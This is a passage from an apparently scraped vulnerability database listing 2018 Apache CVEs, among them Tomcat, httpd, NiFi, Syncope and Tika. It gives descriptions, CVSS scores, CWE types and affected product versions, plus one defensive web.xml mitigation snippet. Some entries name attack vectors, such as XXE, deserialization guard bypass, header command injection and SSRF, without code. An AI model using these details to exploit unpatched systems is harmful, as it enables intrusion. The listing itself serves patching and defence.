debian debian_linux 9.0
netapp santricity_cloud_connector -
debian debian_linux 7.0
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
canonical ubuntu_linux 14.04
redhat enterprise_linux 7.6
netapp storagegrid -
CVE-2018-1302 MEDIUM

When an HTTP/2 stream was destroyed after being handled, the Apache HTTP Server prior to version 2.4.30 could have written a NULL pointer potentially to an already freed memory. The memory pools maintained by the server make this vulnerability hard to trigger in usual configurations, the reporter and the team could not reproduce it outside debug builds, so it is classified as low risk.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
netapp santricity_cloud_connector -
netapp clustered_data_ontap -
netapp storagegrid -
CVE-2018-1303 MEDIUM

A specially crafted HTTP request header could have crashed the Apache HTTP Server prior to version 2.4.30 due to an out of bound read while preparing data to be cached in shared memory. It could be used as a Denial of Service attack against users of mod_cache_socache. The vulnerability is considered as low risk since mod_cache_socache is not widely used, mod_cache_disk is not concerned by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
canonical ubuntu_linux 14.04
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
netapp storagegrid -
CVE-2018-1304 MEDIUM

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle secure_global_desktop 5.3
canonical ubuntu_linux 18.04
oracle micros_relate_crm_software 11.4
apache tomcat 8.0.0
oracle secure_global_desktop 5.4
debian debian_linux 9.0
oracle hospitality_guest_access 4.2.1
redhat jboss_enterprise_application_platform 6
debian debian_linux 7.0
redhat jboss_enterprise_application_platform 6.4
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache tomcat *
canonical ubuntu_linux 16.04
oracle fusion_middleware 12.2.1.3.0
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
oracle hospitality_guest_access 4.2.0
redhat jboss_enterprise_web_server 3.0.0
redhat jboss_middleware 1
CVE-2018-1305 MEDIUM

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
apache tomcat 9.0.4
oracle micros_relate_crm_software 11.4
apache tomcat 8.0.0
debian debian_linux 9.0
debian debian_linux 7.0
apache tomcat 9.0.1
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache tomcat 9.0.3
apache tomcat 9.0.2
apache tomcat *
canonical ubuntu_linux 16.04
oracle fusion_middleware 12.2.1.3.0
oracle managed_file_transfer 12.2.1.3.0
oracle managed_file_transfer 12.1.3.0.0
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
CVE-2018-1306 MEDIUM

The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache pluto 3.0.0
CVE-2018-1307 MEDIUM

In Apache jUDDI 3.2 through 3.3.4, if using the WADL2Java or WSDL2Java classes, which parse a local or remote XML document and then mediates the data structures into UDDI data structures, there are little protections present against entity expansion and DTD type of attacks. Mitigation is to use 3.3.5.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache juddi *
CVE-2018-1308 MEDIUM

This vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=<inlinexml>` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
debian debian_linux 9.0
debian debian_linux 7.0
apache solr *
debian debian_linux 8.0
CVE-2018-1309 HIGH

Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-1310 MEDIUM

Apache NiFi JMS Deserialization issue because of ActiveMQ client vulnerability. Malicious JMS content could cause denial of service. See ActiveMQ CVE-2015-5254 announcement for more information. The fix to upgrade the activemq-client library to 5.15.3 was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-1311 MEDIUM

The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
redhat enterprise_linux_eus 7.7
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 39
apache xerces-c++ *
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_aus 7.7
fedoraproject fedora 38
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
oracle goldengate *
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2018-1312 MEDIUM

In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache http_server 2.4.7
canonical ubuntu_linux 18.04
redhat enterprise_linux_server_tus 7.6
apache http_server 2.4.28
redhat jboss_core_services 1.0
apache http_server 2.4.2
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
apache http_server 2.4.18
apache http_server 2.4.3
apache http_server 2.4.26
apache http_server 2.4.10
canonical ubuntu_linux 12.04
netapp cloud_backup -
apache http_server 2.4.1
apache http_server 2.4.17
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
netapp storagegrid -
apache http_server 2.4.25
debian debian_linux 9.0
debian debian_linux 7.0
apache http_server 2.4.23
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache http_server 2.4.4
apache http_server 2.4.16
canonical ubuntu_linux 16.04
apache http_server 2.4.29
apache http_server 2.4.9
apache http_server 2.4.27
redhat enterprise_linux_server 7.0
CVE-2018-1313 LOW

In Apache Derby 10.3.1.4 to 10.14.1.0, a specially-crafted network packet can be used to request the Derby Network Server to boot a database whose location and contents are under the user's control. If the Derby Network Server is not running with a Java Security Manager policy file, the attack is successful. If the server is using a policy file, the policy file must permit the database location to be read for the attack to work. The default Derby Network Server policy file distributed with the affected releases includes a permissive policy as the default Network Server policy, which allows the attack to work.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N 1.6 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache derby *
oracle weblogic_server 12.2.1.3
CVE-2018-1314 MEDIUM

In Apache Hive 2.3.3, 3.1.0 and earlier, Hive "EXPLAIN" operation does not check for necessary authorization of involved entities in a query. An unauthorized user can do "EXPLAIN" on arbitrary table or view and expose table metadata and statistics.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1315 MEDIUM

In Apache Hive 2.1.0 to 2.3.2, when 'COPY FROM FTP' statement is run using HPL/SQL extension to Hive, a compromised/malicious FTP server can cause the file to be written to an arbitrary location on the cluster where the command is run from. This is because FTP client code in HPL/SQL does not verify the destination location of the downloaded file. This does not affect hive cli user and hiveserver2 user as hplsql is a separate command line script and needs to be invoked differently.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1316 MEDIUM

The ODE process deployment web service was sensible to deployment messages with forged names. Using a path for the name was allowing directory traversal, resulting in the potential writing of files under unwanted locations, the overwriting of existing files or their deletion. This issue was addressed in Apache ODE 1.3.3 which was released in 2009, however the incorrect name CVE-2008-2370 was used on the advisory by mistake.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache ode 1.1.1
apache ode 1.0
apache ode 1.1
apache ode *
CVE-2018-1317 MEDIUM

In Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2018-1318 MEDIUM

Adding method ACLs in remap.config can cause a segfault when the user makes a carefully crafted request. This affects versions Apache Traffic Server (ATS) 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-1319 MEDIUM

In Apache Allura prior to 1.8.1, attackers may craft URLs that cause HTTP response splitting. If a victim goes to a maliciously crafted URL, unwanted results may occur including XSS or service denial for the victim's browsing session.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache allura *
CVE-2018-1320 MEDIUM

Apache Thrift Java client library versions 0.5.0 through 0.11.0 can bypass SASL negotiation isComplete validation in the org.apache.thrift.transport.TSaslTransport class. An assert used to determine if the SASL handshake had successfully completed could be disabled in production settings making the validation incomplete.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle global_lifecycle_management_opatch *
apache thrift *
oracle nosql_database *
debian debian_linux 8.0
f5 traffix_signaling_delivery_controller *
CVE-2018-1321 MEDIUM

An administrator with report and template entitlements in Apache Syncope 1.2.x before 1.2.11, 2.0.x before 2.0.8, and unsupported releases 1.0.x and 1.1.x which may be also affected, can use XSL Transformations (XSLT) to perform malicious operations, including but not limited to file read, file write, and code execution.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache syncope 1.0.7
apache syncope 1.1.8
apache syncope 1.1.2
apache syncope 1.2.0
apache syncope 1.1.3
apache syncope 1.0.0
apache syncope 1.1.4
apache syncope 1.0.6
apache syncope 1.1.6
apache syncope 1.1.5
apache syncope 1.0.8
apache syncope 1.0.9
apache syncope 1.1.7
apache syncope *
apache syncope 1.1.1
apache syncope 1.0.5
apache syncope 1.1.0
apache syncope 1.0.4
CVE-2018-1322 MEDIUM

An administrator with user search entitlements in Apache Syncope 1.2.x before 1.2.11, 2.0.x before 2.0.8, and unsupported releases 1.0.x and 1.1.x which may be also affected, can recover sensitive security values using the fiql and orderby parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache syncope 1.0.7
apache syncope 1.1.8
apache syncope 1.1.2
apache syncope 1.1.3
apache syncope 1.0.0
apache syncope 1.1.4
apache syncope 1.0.6
apache syncope 1.1.6
apache syncope 1.1.5
apache syncope 1.0.3
apache syncope 1.0.8
apache syncope 1.0.9
apache syncope 1.1.7
apache syncope *
apache syncope 1.1.1
apache syncope 1.0.5
apache syncope 1.1.0
apache syncope 1.0.4
CVE-2018-1323 MEDIUM

The IIS/ISAPI specific code in the Apache Tomcat JK ISAPI Connector 1.2.0 to 1.2.42 that normalised the requested path before matching it to the URI-worker map did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via IIS, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing Tomcat via the reverse proxy.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-200,

Products Affected

Vendor Product Version
apache tomcat_jk_connector *
CVE-2018-1324 MEDIUM

A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle mysql_cluster *
oracle weblogic_server 14.1.1.0.0
apache commons_compress *
CVE-2018-1327 MEDIUM

The Apache Struts REST Plugin is using XStream library which is vulnerable and allow perform a DoS attack when using a malicious request with specially crafted XML payload. Upgrade to the Apache Struts version 2.5.16 and switch to an optional Jackson XML handler as described here http://struts.apache.org/plugins/rest/#custom-contenttypehandlers. Another option is to implement a custom XML handler based on the Jackson XML handler from the Apache Struts 2.5.16.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
CVE-2018-1328 MEDIUM

Apache Zeppelin prior to 0.8.0 had a stored XSS issue via Note permissions. Issue reported by "Josna Joseph".

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2018-1330 MEDIUM

When parsing a malformed JSON payload, libprocess in Apache Mesos versions 1.4.0 to 1.5.0 might crash due to an uncaught exception. Parsing chunked HTTP requests with trailers can lead to a libprocess crash too because of the mistakenly planted assertion. A malicious actor can therefore cause a denial of service of Mesos masters rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache mesos 1.6.0
apache mesos *
apache mesos 1.4.0
CVE-2018-1331 MEDIUM

In Apache Storm 0.10.0 through 0.10.2, 1.0.0 through 1.0.6, 1.1.0 through 1.1.2, and 1.2.0 through 1.2.1, an attacker with access to a secure storm cluster in some cases could execute arbitrary code as a different user.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-1332 MEDIUM

Apache Storm version 1.0.6 and earlier, 1.2.1 and earlier, and version 1.1.2 and earlier expose a vulnerability that could allow a user to impersonate another user when communicating with some Storm Daemons.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-1333 MEDIUM

By specially crafting HTTP/2 requests, workers would be allocated 60 seconds longer than necessary, leading to worker exhaustion and a denial of service. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.18-2.4.30,2.4.33).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
netapp cloud_backup -
canonical ubuntu_linux 18.04
netapp storage_automation_store -
apache http_server 2.4.33
redhat jboss_core_services 1.0
CVE-2018-1334 LOW

In Apache Spark 1.0.0 to 2.1.2, 2.2.0 to 2.2.1, and 2.3.0, when using PySpark or SparkR, it's possible for a different local user to connect to the Spark application and impersonate the user running the Spark application.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache spark 2.3.0
apache spark *
CVE-2018-1335 HIGH

From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-1336 MEDIUM

An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 6.0.0
apache tomcat 8.0.0
debian debian_linux 9.0
redhat jboss_enterprise_web_server 5.0.0
debian debian_linux 8.0
apache tomcat *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
redhat jboss_enterprise_application_platform 6.4.0
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2018-1337 MEDIUM

In Apache Directory LDAP API before 1.0.2, a bug in the way the SSL Filter was setup made it possible for another thread to use the connection before the TLS layer has been established, if the connection has already been used and put back in a pool of connections, leading to leaking any information contained in this request (including the credentials when sending a BIND request).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache directory_ldap_api *
CVE-2018-1338 MEDIUM

A carefully crafted (or fuzzed) file can trigger an infinite loop in Apache Tika's BPGParser in versions of Apache Tika before 1.18.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-1339 MEDIUM

A carefully crafted (or fuzzed) file can trigger an infinite loop in Apache Tika's ChmParser in versions of Apache Tika before 1.18.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-1340 MEDIUM

Prior to 1.0.0, Apache Guacamole used a cookie for client-side storage of the user's session token. This cookie lacked the "secure" flag, which could allow an attacker eavesdropping on the network to intercept the user's session token if unencrypted HTTP requests are made to the same domain.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-311,

Products Affected

Vendor Product Version
apache guacamole *
CVE-2018-14889 MEDIUM

CouchDB in Vectra Networks Cognito Brain and Sensor before 4.3 contains a local code execution vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache couchdb -
CVE-2018-17184 LOW

A malicious user with enough administration entitlements can inject html-like elements containing JavaScript statements into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with enough administration entitlements edits one of the Entities above via Admin Console, the injected JavaScript code is executed.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache syncope *
CVE-2018-17186 MEDIUM

An administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache syncope *
CVE-2018-17187 MEDIUM

The Apache Qpid Proton-J transport includes an optional wrapper layer to perform TLS, enabled by use of the 'transport.ssl(...)' methods. Unless a verification mode was explicitly configured, client and server modes previously defaulted as documented to not verifying a peer certificate, with options to configure this explicitly or select a certificate verification mode with or without hostname verification being performed. The latter hostname verifying mode was not implemented in Apache Qpid Proton-J versions 0.3 to 0.29.0, with attempts to use it resulting in an exception. This left only the option to verify the certificate is trusted, leaving such a client vulnerable to Man In The Middle (MITM) attack. Uses of the Proton-J protocol engine which do not utilise the optional transport TLS wrapper are not impacted, e.g. usage within Qpid JMS. Uses of Proton-J utilising the optional transport TLS wrapper layer that wish to enable hostname verification must be upgraded to version 0.30.0 or later and utilise the VerifyMode#VERIFY_PEER_NAME configuration, which is now the default for client mode usage unless configured otherwise.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache qpid_proton-j *
CVE-2018-17188 MEDIUM

Prior to CouchDB version 2.3.0, CouchDB allowed for runtime-configuration of key components of the database. In some cases, this lead to vulnerabilities where CouchDB admin users could access the underlying operating system as the CouchDB user. Together with other vulnerabilities, it allowed full system entry for unauthenticated users. Rather than waiting for new vulnerabilities to be discovered, and fixing them as they come up, the CouchDB development team decided to make changes to avoid this entire class of vulnerabilities.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2018-17189 MEDIUM

In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
netapp storage_automation_store -
netapp santricity_cloud_connector -
apache http_server 2.4.30
oracle instantis_enterprisetrack 17.1
oracle hospitality_guest_access 4.2.1
apache http_server 2.4.28
redhat jboss_core_services 1.0
fedoraproject fedora 28
oracle enterprise_manager_ops_center 12.3.3
apache http_server 2.4.18
apache http_server 2.4.26
apache http_server 2.4.17
apache http_server 2.4.33
canonical ubuntu_linux 14.04
oracle retail_xstore_point_of_service 7.1
apache http_server 2.4.34
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
fedoraproject fedora 29
oracle retail_xstore_point_of_service 7.0
oracle sun_zfs_storage_appliance_kit 8.8.6
apache http_server 2.4.25
debian debian_linux 9.0
apache http_server 2.4.23
apache http_server 2.4.20
canonical ubuntu_linux 16.04
apache http_server 2.4.35
apache http_server 2.4.29
oracle instantis_enterprisetrack 17.2
apache http_server 2.4.27
apache http_server 2.4.37
CVE-2018-17190 HIGH

In all versions of Apache Spark, its standalone resource manager accepts code to execute on a 'master' host, that then runs that code on 'worker' hosts. The master itself does not, by design, execute user code. A specially-crafted request to the master can, however, cause the master to execute code too. Note that this does not affect standalone clusters with authentication enabled. While the master host typically has less outbound access to other resources than a worker, the execution of code on the master is nevertheless unexpected.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-17191 HIGH

Apache NetBeans (incubating) 9.0 NetBeans Proxy Auto-Configuration (PAC) interpretation is vulnerable for remote command execution (RCE). Using the nashorn script engine the environment of the javascript execution for the Proxy Auto-Configuration leaks privileged objects, that can be used to circumvent the execution limits. If a different script engine was used, no execution limits were in place. Both vectors allow remote code execution.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache netbeans 9.0
CVE-2018-17192 MEDIUM

The X-Frame-Options headers were applied inconsistently on some HTTP responses, resulting in duplicate or missing security headers. Some browsers would interpret these results incorrectly, allowing clickjacking attacks. Mitigation: The fix to consistently apply the security headers was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1021,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17193 MEDIUM

The message-page.jsp error page used the value of the HTTP request header X-ProxyContextPath without sanitization, resulting in a reflected XSS attack. Mitigation: The fix to correctly parse and sanitize the request attribute value was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17194 MEDIUM

When a client request to a cluster node was replicated to other nodes in the cluster for verification, the Content-Length was forwarded. On a DELETE request, the body was ignored, but if the initial request had a Content-Length value other than 0, the receiving nodes would wait for the body and eventually timeout. Mitigation: The fix to check DELETE requests and overwrite non-zero Content-Length header values was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17195 MEDIUM

The template upload API endpoint accepted requests from different domain when sent in conjunction with ARP spoofing + man in the middle (MiTM) attack, resulting in a CSRF attack. The required attack vector is complex, requiring a scenario with client certificate authentication, same subnet access, and injecting malicious code into an unprotected (plaintext HTTP) website which the targeted user later visits, but the possible damage warranted a Severe severity level. Mitigation: The fix to apply Cross-Origin Resource Sharing (CORS) policy request filtering was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,CWE-863,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17196 MEDIUM

In Apache Kafka versions between 0.11.0.0 and 2.1.0, it is possible to manually craft a Produce request which bypasses transaction/idempotent ACL validation. Only authenticated clients with Write permission on the respective topics are able to exploit this vulnerability. Users should upgrade to 2.1.1 or later where this vulnerability has been fixed.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache kafka *
CVE-2018-17197 MEDIUM

A carefully crafted or corrupt sqlite file can cause an infinite loop in Apache Tika's SQLite3Parser in versions 1.8-1.19.1 of Apache Tika.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-17198 HIGH

Server-side Request Forgery (SSRF) and File Enumeration vulnerability in Apache Roller 5.2.1, 5.2.0 and earlier unsupported versions relies on Java SAX Parser to implement its XML-RPC interface and by default that parser supports external entities in XML DOCTYPE, which opens Roller up to SSRF / File Enumeration vulnerability. Note that this vulnerability exists even if Roller XML-RPC interface is disable via the Roller web admin UI. Mitigation: There are a couple of ways you can fix this vulnerability: 1) Upgrade to the latest version of Roller, which is now 5.2.2 2) Or, edit the Roller web.xml file and comment out the XML-RPC Servlet mapping as shown below: <!-- <servlet-mapping> <servlet-name>XmlRpcServlet</servlet-name> <url-pattern>/roller-services/xmlrpc</url-pattern> </servlet-mapping> -->

CVSS 2.0

Severity: HIGH

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache roller 5.2.1
apache roller 5.2.0
apache roller *
CVE-2018-17199 MEDIUM

In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
canonical ubuntu_linux 14.04
oracle enterprise_manager_ops_center 12.3.3
debian debian_linux 8.0
CVE-2018-17200 HIGH

The Apache OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. This service takes the `serviceContent` parameter in the request and deserializes it using XStream. This `XStream` instance is slightly guarded by disabling the creation of `ProcessBuilder`. However, this can be easily bypassed (and in multiple ways). Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16 r1850017+1850019

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2018-17201 MEDIUM

Certain input files could make the code hang when Apache Sanselan 0.97-incubator was used to parse them, which could be used in a DoS attack. Note that Apache Sanselan (incubating) was renamed to Apache Commons Imaging.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache commons_imaging 0.97
CVE-2018-17202 MEDIUM

